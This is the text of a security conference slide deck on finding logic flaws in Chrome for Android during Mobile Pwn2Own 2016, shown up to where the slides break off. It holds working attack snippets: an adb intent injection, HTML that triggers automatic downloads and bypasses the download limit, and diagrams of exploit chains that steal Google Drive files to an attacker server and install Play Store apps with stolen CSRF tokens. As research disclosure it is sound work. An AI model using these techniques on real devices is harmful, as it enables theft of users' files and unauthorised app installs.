![Page 1: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/1.jpg)
Logic Bug Hunting in Chrome on Android
CanSecWest17 March, 2017
![Page 2: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/2.jpg)
Agenda
• Fuzzing and memory corruptions
• Introduction to logic flaws
• General approach to hunting logic bugs
• Application in Mobile Pwn2Own 2016
• Exploit improvement
![Page 3: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/3.jpg)
Tindroductions
![Page 4: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/4.jpg)
Fuzzing and Pwn2Own
• Fuzzing has become mainstream• AFL, LibFuzzer, Radamsa, Honggfuzz, etc.
• It’s almost too easy…
• People find and kill bugs they rarely understand…
• Increasing likelihood of duplicates• libstagefright, Chrome, etc.
• Code changes
• Improved exploit mitigations
![Page 5: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/5.jpg)
Android Mitigations
• More and better security mechanisms• Improved rights management, SELinux, TrustZone
• ASLR, DEP, PIE, RELRO, PartitionAlloc, Improved GC
• Significant increase in exploit development time• Multiple bugs are usually chained together
• PoC isn’t enough for the competition
• We can’t afford spending too much time on Pwn2Own
![Page 6: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/6.jpg)
Memory Corruptions vs. Logic Flaws• Memory corruptions
• Programming errors
• Memory safety violations
• Architecture-dependent
• General mitigations
• Logic flaws• Design vulnerabilities
• Intended behaviour
• Architecture-agnostic
• Lack of general mitigation mechanisms
![Page 7: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/7.jpg)
We Love Logic Bugs
• Equally beautiful and hilarious vectors
• Basic tools
• Actual exploits might be somewhat convoluted
Q: How many bugs do you have in your chain?
A: We abuse one and a half features.
Q: What tool did you use to find that bug?
A: Notepad.
![Page 8: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/8.jpg)
It’s not just us…
![Page 9: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/9.jpg)
It’s not just us…
![Page 10: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/10.jpg)
It’s not just us…
![Page 11: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/11.jpg)
It’s not just us…
![Page 12: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/12.jpg)
Identifying Logic Flaws
• I don’t know what I’m doing…
• Lack of one-size-fits-all methodology
• Thou shalt know thy target
• Less known or obscure features
• Trust boundaries and boundary violations
• Threat modelling
![Page 13: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/13.jpg)
Mobile Pwn2Own 2016
![Page 14: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/14.jpg)
Mobile Pwn2Own 2016
![Page 15: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/15.jpg)
Mobile Pwn2Own 2016
✘
![Page 16: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/16.jpg)
Mobile Pwn2Own 2016
“All entries must compromise the devices by browsing to web content […] or by viewing/receiving an MMS/SMS message.”http://zerodayinitiative.com/MobilePwn2Own2016Rules.html
Category Phone Price (USD)
Obtaining Sensitive Information
Apple iPhone $50,000
Google Nexus $50,000
Samsung Galaxy $35,000
Install Rogue Application
Apple iPhone $125,000
Google Nexus $100,000
Samsung Galaxy $60,000
Force Phone Unlock Apple iPhone $250,000
![Page 17: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/17.jpg)
Where do we start?
• Ruling out SMS/MMS• Limited to media rendering bugs
• Chrome• Core components
• URI handlers
• IPC to other applications
![Page 18: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/18.jpg)
Google Admin
• Case study from 2015
![Page 19: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/19.jpg)
Google Admin
<activity android:name="com.google.android.apps.
enterprise.cpanel.activities.ResetPinActivity">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:host="localhost" android:scheme="http"/>
</intent-filter>
</activity>
AndroidManifest.xml
![Page 20: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/20.jpg)
Google Admin
public void onCreate(Bundle arg3) {
this.c = this.getIntent().getExtras().getString("setup_url");
this.b.loadUrl(this.c);
// ...
}
ResetPinActivity.java
![Page 21: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/21.jpg)
Google Admin
• Attacking with malware
adb shell am start \
–d http://localhost/foo \
-e setup_url file:////data/data/com.malware/file.html
![Page 22: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/22.jpg)
Google Admin
Chrome
file:///tmp/foo.html
Uncaught DOMException: Blocked a frame with origin "null" from accessing a cross-origin frame.
<HTML><BODY>
<IFRAME SRC="file:///tmp/foo.html" id="foo"
onLoad="console.log(document.getElementById('foo').contentDocument.body.innerHTML);">
</IFRAME>
</BODY></HTML>
![Page 23: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/23.jpg)
Google Admin
Chrome on Android API 17
file:///sdcard/foo.html
Yep, that’s fine!
<HTML><BODY>
<IFRAME SRC="file:///sdcard/foo.html" id="foo"
onLoad="console.log(document.getelementById('foo').contentDocument.body.innerHTML);">
</IFRAME>
</BODY></HTML>
![Page 24: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/24.jpg)
Google Admin
• Malicious app creates a world readable file, e.g. foo.html
• foo.html will load an iframe with src = “foo.html”after a small delay
• Sends a URL for foo.html to Google Admin via IPC
• Change foo.html to be a symbolic link pointing to a file in the Google Admin’s sandbox
• Post file contents back to a web server
![Page 25: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/25.jpg)
Same-Origin Policy
• Chrome for Android vs. Chrome• Different SOP
• Custom Android schemes
• Worth investigating…
![Page 26: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/26.jpg)
SOP in Chrome for Android
HTTP / HTTPS Scheme, domain and port number must match.
FILEFull file path for origin until API 23. Starting with API 24, all origins are now NULL.
CONTENT Scheme, domain and port number must match.
DATA All origins are NULL.
![Page 27: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/27.jpg)
Jumping Origins
HTTP / HTTPS FILE CONTENT DATA
HTTP / HTTPS ✓ ✘ ✓ ✓
FILE ✓ ✓ ✓ ✓
CONTENT ✓ ✘ ✓ ✓
DATA ✓ ✘ ✓ ✓
Destination Scheme
Sou
rce
Sch
eme
![Page 28: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/28.jpg)
Android Content Providers
• Implement data repositories
• Exportable for external access
• Declared in AndroidManifest.xml
• Read and write access control
• Content URIs• Combination of ‘authority’ and ‘path’
• content://<authority><path>
• content://downloads/my_downloads/45
• What about SOP?
![Page 29: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/29.jpg)
Android Download Manager
• System service that handles long-running HTTP downloads
• Back to SOP…
content://downloads/my_downloads/45
content://downloads/my_downloads/46
content://downloads/my_downloads/102
![Page 30: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/30.jpg)
Automatic File Downloads
• Thank you, HTML5!• Confirmed to work in Chrome
• <a href=“foo.html” download>
• <a href=“foo.html” download=“bar.html">
• Zero user interaction• Link click using JavaScript
• Perfect for Pwn2Own
![Page 31: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/31.jpg)
Automatic File Downloads
<a id='foo' href='evil.html' download> link </a>
<script>
document.getElementById('foo').click();
</script>
![Page 32: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/32.jpg)
Exploit #1 – Stealing Downloaded Files
GET /index.html
index.html
Attacker’sWeb Server
Victim’sBrowser
AndroidDownload Manager
![Page 33: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/33.jpg)
Exploit #1 – Stealing Downloaded Files
GET /index.html
index.html
https://attacker.com/index.html
Attacker’sWeb Server
Victim’sBrowser
AndroidDownload Manager
![Page 34: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/34.jpg)
Exploit #1 – Stealing Downloaded Files
GET /index.html
index.html
GET /evil.html
evil.html (download)
evil.html (download)
Attacker’sWeb Server
Victim’sBrowser
AndroidDownload Manager
![Page 35: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/35.jpg)
Exploit #1 – Stealing Downloaded Files
GET /index.html
index.html
GET /evil.html
evil.html (download)
evil.html (download)
https://attacker.com/index.html
Attacker’sWeb Server
Victim’sBrowser
AndroidDownload Manager
![Page 36: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/36.jpg)
Exploit #1 – Stealing Downloaded Files
GET /index.html
index.html
GET /evil.html
evil.html (download)
evil.html (download)
GET my_downloads/54
evil.html
Attacker’sWeb Server
Victim’sBrowser
AndroidDownload Manager
![Page 37: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/37.jpg)
Exploit #1 – Stealing Downloaded Files
GET /index.html
index.html
GET /evil.html
evil.html (download)
evil.html (download)
GET my_downloads/54
evil.html
content://downloads/my_downloads/54
Attacker’sWeb Server
Victim’sBrowser
AndroidDownload Manager
![Page 38: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/38.jpg)
Exploit #1 – Stealing Downloaded Files
GET /index.html
index.html
GET /evil.html
evil.html (download)
evil.html (download)
GET my_downloads/54
evil.html
GET my_downloads/53
secrets.pdf
secrets.pdf
Attacker’sWeb Server
Victim’sBrowser
AndroidDownload Manager
![Page 39: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/39.jpg)
Mobile Pwn2Own 2016
Category Phone Price (USD)
Obtaining Sensitive Information
Apple iPhone $50,000
Google Nexus $50,000
Samsung Galaxy $35,000
Install Rogue Application
Apple iPhone $125,000
Google Nexus $100,000
Samsung Galaxy $60,000
Force Phone Unlock Apple iPhone $250,000
![Page 40: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/40.jpg)
Exploit Enhancement
• Downloading arbitrary files• User sessions
<a id='foo' href='https://drive.google.com/my_drive.html' download> link </a>
<script>
document.getElementById('foo').click();
</script>
![Page 41: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/41.jpg)
Multiple File Downloads
• Multiple automatic downloads from the same page are forbidden
![Page 42: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/42.jpg)
Multiple File Downloads Restriction Bypass• However…
page1.html
page2.html
<meta http-equiv="refresh" content="0; url=page2.html" />
<script>
window.history.back();
</script>
![Page 43: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/43.jpg)
evil.html (download)
Exploit #2 – Stealing Google Drive Files
GET my_downloads/54
evil.html
Attacker’sWeb Server
Google Drive Web Server
Victim’sBrowser
AndroidDownload Manager
![Page 44: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/44.jpg)
evil.html (download)
Exploit #2 – Stealing Google Drive Files
GET my_downloads/54
evil.html
Attacker’sWeb Server
Google Drive Web Server
Victim’sBrowser
AndroidDownload Manager
content://downloads/my_downloads/54
![Page 45: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/45.jpg)
evil.html (download)
my_drive.html(download)
GET /my_drive.html
Exploit #2 – Stealing Google Drive Files
GET my_downloads/54
evil.html
Attacker’sWeb Server
Google Drive Web Server
Victim’sBrowser
AndroidDownload Manager
![Page 46: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/46.jpg)
evil.html (download)
my_drive.html(download)
GET /my_drive.html
Exploit #2 – Stealing Google Drive Files
GET my_downloads/54
evil.html
GET my_downloads/55
my_drive.html
my_drive.html (download)
Attacker’sWeb Server
Google Drive Web Server
Victim’sBrowser
AndroidDownload Manager
![Page 47: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/47.jpg)
evil.html (download)
my_drive.html(download)
GET /my_drive.html
Exploit #2 – Stealing Google Drive Files
GET my_downloads/54
evil.html
GET my_downloads/55
my_drive.html
my_drive.html (download)
bounce.html
GET /bounce.html
Attacker’sWeb Server
Google Drive Web Server
Victim’sBrowser
AndroidDownload Manager
https://attacker.com/bounce.html
![Page 48: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/48.jpg)
evil.html (download)
my_drive.html(download)
GET /my_drive.html
Exploit #2 – Stealing Google Drive Files
GET my_downloads/54
evil.html
GET my_downloads/55
my_drive.html
my_drive.html (download)
bounce.html
history.back();
GET /bounce.html
Attacker’sWeb Server
Google Drive Web Server
Victim’sBrowser
AndroidDownload Manager
content://downloads/my_downloads/54
![Page 49: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/49.jpg)
evil.html (download)
my_drive.html(download)
GET /my_drive.html
Exploit #2 – Stealing Google Drive Files
GET my_downloads/54
evil.html
GET my_downloads/55
my_drive.html
my_drive.html (download)
bounce.html
GET /img?id=12345678
img_foo.jpg(download)
history.back();
GET /bounce.html
Attacker’sWeb Server
Google Drive Web Server
Victim’sBrowser
AndroidDownload Manager
![Page 50: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/50.jpg)
evil.html (download)
my_drive.html(download)
GET /my_drive.html
Exploit #2 – Stealing Google Drive Files
GET my_downloads/54
evil.html
GET my_downloads/55
my_drive.html
my_drive.html (download)
bounce.html
GET /img?id=12345678
img_foo.jpg(download)
POST /exfiltrate
history.back();
img_foo.jpg (download)
GET my_downloads/56
my_drive.html
GET /bounce.html
Attacker’sWeb Server
Google Drive Web Server
Victim’sBrowser
AndroidDownload Manager
![Page 51: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/51.jpg)
LLL TTT TTTLLL TTT TTTLLL TTT TTT
mMMMm.mMMm. AAAAa. LLL .cCCCCc .oOOo. NNNNNn. TTTTTT .eEEe. NNNNNn. TTTTTTMMM "MMM "MMm "AAa LLL cCCC" oOO""OOo NNN "NNn TTT eEE EEe NNN "NNn TTT MMM MMM MMM .aAAAAAA LLL ====== CCC OOO OOO NNN NNN TTT EEEEEEEE NNN NNN TTT MMM MMM MMM AAA AAA LLL CCCc. oOO..OOo NNN NNN tTTt. EEe. NNN NNN TTTt. MMM MMM MMM "YAAAAAA LLL "CCCCCc "OOOO" NNN NNN "tTTT "EEEEE NNN NNN "TTTT
![Page 52: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/52.jpg)
Drive Files Download Demo
![Page 53: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/53.jpg)
Mobile Pwn2Own 2016
Category Phone Price (USD)
Obtaining Sensitive Information
Apple iPhone $50,000
Google Nexus $50,000
Samsung Galaxy $35,000
Install Rogue Application
Apple iPhone $125,000
Google Nexus $100,000
Samsung Galaxy $60,000
Force Phone Unlock Apple iPhone $250,000
![Page 54: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/54.jpg)
Bettererer Exploit
• We can also make POST requests
• Download pages containing CSRF token
• Use CSRF token in POST request
• We’ve got everything now…
![Page 55: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/55.jpg)
Exploit #3 – Install APK from Play Store• Grab a CSRF token
https://play.google.com/store
• Grab victim’s device ID
sahttps://play.google.com/settings
• Install APK via POST request using CSRF token and device ID
function(){window._uc='[\x22Kx1pa-cDQOe_1C6Q0J2ixtQT22:1477462478689\x22,
\x220\x22, \x22en\x22,\x22GB\x22,
<tr class="excPab-rAew03" id="g1921daaeef107b4" data-device-id="
g1921daaeef107b4" data-nickname="" data-visible="true" jsname="fscTHd">
id=com.mylittlepony.game&device=g1921daaeef107b4&token=Ka1pa-
dDQOe_1C6Q0J2ixtQT32:1477462478689
https://play.google.com/store/install?authuser=0
![Page 56: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/56.jpg)
Exploit #3 – Install APK from Play Store
evil.html
Attacker’sWeb Server
Google Play Web Server
Victim’sBrowser
AndroidDownload Manager
![Page 57: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/57.jpg)
Exploit #3 – Install APK from Play Store
evil.html
Attacker’sWeb Server
Google Play Web Server
Victim’sBrowser
AndroidDownload Manager
content://downloads/my_downloads/54
![Page 58: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/58.jpg)
store.html (download)
GET /store.html
Exploit #3 – Install APK from Play Store
evil.html
store.html (download)
GET /bounce.html
bounce.html
Attacker’sWeb Server
Google Play Web Server
Victim’sBrowser
AndroidDownload Manager
https://attacker.com/bounce.html
![Page 59: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/59.jpg)
store.html (download)
GET /store.html
Exploit #3 – Install APK from Play Store
evil.html
store.html (download)
history.back();
GET /bounce.html
bounce.html
Attacker’sWeb Server
Google Play Web Server
Victim’sBrowser
AndroidDownload Manager
content://downloads/my_downloads/54
![Page 60: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/60.jpg)
store.html (download)
GET /store.html
GET my_downloads/55
store.html
settings.html (download)
GET /settings.html
Exploit #3 – Install APK from Play Store
evil.html
store.html (download)
history.back();
settings.html (download)
GET /bounce.html
bounce.html
Attacker’sWeb Server
Google Play Web Server
Victim’sBrowser
AndroidDownload Manager
